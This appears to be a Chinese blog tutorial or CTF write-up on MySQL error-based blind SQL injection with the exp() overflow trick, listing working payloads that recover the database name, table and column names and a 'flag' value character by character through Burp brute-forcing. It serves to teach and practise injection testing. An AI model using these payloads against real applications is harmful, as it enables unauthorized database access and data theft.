【exp报错注入】

整数范围

最大整数


exp 函数介绍

报错盲注注入

payload分析

709+C-ASCII 值就等于我们下面的 709+1-1 ,C就是我们要猜的值,当我们猜测的值和ASCII码相等时,那么exp就不会出现报错,因为+1-1还是等于709:

练习

cpp 复制代码
id=1 and 1=1%23    返回hello,admin
id=1' and 1=1%23   返回数据库操作错误

通过上面测试这是一个数字型注入的题目我们直接用下面的payload:

cpp 复制代码
猜测数据库名的长度
id=1 and exp(709%2b4-length(database()))%23

我们看到上面payload里的709%2b4%23是加号的意思这里的意思是709+4,那么为什么要把+号编码呢?因为在burp里+号会被认为是空格,所以需要url编码来编码一下,我们来发包:

这里提示数据库操作错误,因为我们这里的猜测是值是4,出现报错说明我们后面的数据库长度没有四位,因为根据我们的exp(709)大于709会报错的特性,那么数据库长度必然小于4,不然的话不会出现报错,这里我们使用burp的爆破模块来猜测长度,在C的位置打上标记:

这里我们是从大到小猜的,

我们观察发现474为错误信息,4和3之间有个转折点,从原本报错的4变成3后正常了,那么说明我们数据库的长度为3:

下面我们开始猜测数据库名:

cpp 复制代码
猜测数据库名
id=1 and exp(709%2b119-ascii(substr((select database()),1,1)))%23

直接在C打上标记:

因为exp的特性,所以我们需要从大到小开始猜测,ASCII码的可见范围是32~127,那么我们就从127开始猜测:

我们找到报错和正常的转折点的数字,119就是我们所需要的正确的ASCII,第二位第三位都是同理:

cpp 复制代码
猜表名的长度
id=1 and exp(709%2b9-(select length(group_concat(table_name)) from information_schema.tables where table_schema=database()))%23

猜表名的代码里和上次讲的盲注代码类似,变动的地方是exp函数,我们需要猜测的地方是9的位置,同样爆破9的位置,表名通常不会很大,我们只需要在1~10范围内猜测,大概率就可以拿到长度,其他的payload如下,方法都是类似,用burp标记后爆破就可以得出结果:

cpp 复制代码
测试注入点
id=1 and 1=1%23    返回hello,admin
id=1' and 1=1%23   返回数据库操作错误

猜测数据库名的长度
id=1 and exp(709%2b4-length(database()))%23

猜测数据库名
id=1 and exp(709%2b119-ascii(substr((select database()),1,1)))%23

猜表名
id=1 and exp(709%2b103-ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)))%23

猜列名长度
id=1 and exp(709%2b4-(select length(group_concat(column_name)) from information_schema.columns where table_name='flag'))%23

猜列名
id=1 and exp(709%2b102-ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1)))%23

猜数据长度
id=1 and exp(709%2b38-(select length(flag) from flag))%23

猜数据
id=1 and exp(709%2b102-ascii(substr((select flag from flag),1,1)))%23
相关推荐
计算机毕设定制辅导-无忧学长1 小时前
西门子 PLC 与 Modbus 集成:S7-1500 RTU/TCP 配置指南(一)
服务器·数据库·tcp/ip
程序员柳2 小时前
基于微信小程序的校园二手交易平台、微信小程序校园二手商城源代码+数据库+使用说明,layui+微信小程序+Spring Boot
数据库·微信小程序·layui
梦在深巷、2 小时前
MySQL/MariaDB数据库主从复制之基于二进制日志的方式
linux·数据库·mysql·mariadb
IT乌鸦坐飞机2 小时前
ansible部署数据库服务随机启动并创建用户和设置用户有完全权限
数据库·ansible·centos7
IT_10242 小时前
Spring Boot项目开发实战销售管理系统——数据库设计!
java·开发语言·数据库·spring boot·后端·oracle
祁思妙想3 小时前
八股学习(三)---MySQL
数据库·学习·mysql
惊骇世俗王某人4 小时前
1.MySQL之如何定位慢查询
数据库·mysql
秦歌6664 小时前
向量数据库-Milvus快速入门
数据库·milvus
Edingbrugh.南空5 小时前
Flink SQLServer CDC 环境配置与验证
数据库·sqlserver·flink
码不停蹄的玄黓6 小时前
MySQL分布式ID冲突详解:场景、原因与解决方案
数据库·分布式·mysql·id冲突